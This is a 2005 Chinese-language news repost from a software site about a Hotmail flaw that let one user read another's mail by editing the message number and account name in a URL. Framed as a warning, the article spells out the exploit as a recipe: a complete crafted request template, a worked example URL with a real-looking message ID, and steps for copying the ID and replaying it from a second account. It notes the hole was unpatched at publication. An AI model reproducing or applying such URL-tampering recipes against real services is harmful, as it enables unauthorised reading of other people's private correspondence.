软件工程

本类阅读TOP10

·PHP4 + MYSQL + APACHE 在 WIN 系统下的安装、配置
·Linux 入门常用命令(1)
·Linux 入门常用命令(2)
·使用 DCPROMO/FORCEREMOVAL 命令强制将 Active Directory 域控制器降级
·DirectShow学习(八): CBaseRender类及相应Pin类的源代码分析
·基于ICE方式SIP信令穿透Symmetric NAT技术研究
·Windows 2003网络负载均衡的实现
·一网打尽Win十四种系统故障解决方法
·数百种 Windows 软件的免费替代品列表
·收藏---行百里半九十

分类导航
VC语言Delphi
VB语言ASP
PerlJava
Script数据库
其他语言游戏开发
文件格式网站制作
软件工程.NET开发
Hotmail发现严重安全漏洞

作者:未知 来源:月光软件站 加入时间:2005-2-28 月光软件站

近日,一位Hotmail用户发现,通过简单的更改地址中的邮件编号等信
息就可以浏览它人的邮件内容。由于邮件编号都有一定的规则,所以很容
易猜出来。要完成此项工作,你必须拥有2个Hotmail信箱。
  
  用于偷看他人邮件的地址为:
  
  http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd? _lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%
2fgetmsg&hm___qs=%26msg%3dMSGXXXXXXXXX% 2e(X)X%26start%3d1% 26len%3d99999999999%26login%
3dUSERNAME%26domain%3dhotmail%2ecom
  其中XXXXXXXXX为邮件编号,USERNAME为用户账号,(X)X为介于0和59
之间的第二编码。
  
  比如说,你有一个名为[email protected]的信箱。首先登录此信
箱,打开任何一封邮件,此时地址栏中的地址将是:
  
  http://lw2fd.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a=5691b2b4e104176111971aa0fbb1274&msg=MSG998000947.3&start=197078&len=1060&msgread=1&mfs=182

  这封电子邮件的编号就是MSG998000947.3。把地址拷贝下来,注销。
然后登录另一个信箱。把刚才的那封邮件的编号和账号插入地址栏:
  
  http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998000947%2e3%26start%3d1%26len%3d99999999999%26login%
3dr00tarded%26domain%3dhotmail%2ecom
  回车。看到什么了?对,[email protected]中的那封邮件的内容

  
  提请广大Hotmail用户注意,此漏洞到本站发稿时为止仍未修复。(张
永刚)
  (责编:Cathy)


相关文章

相关软件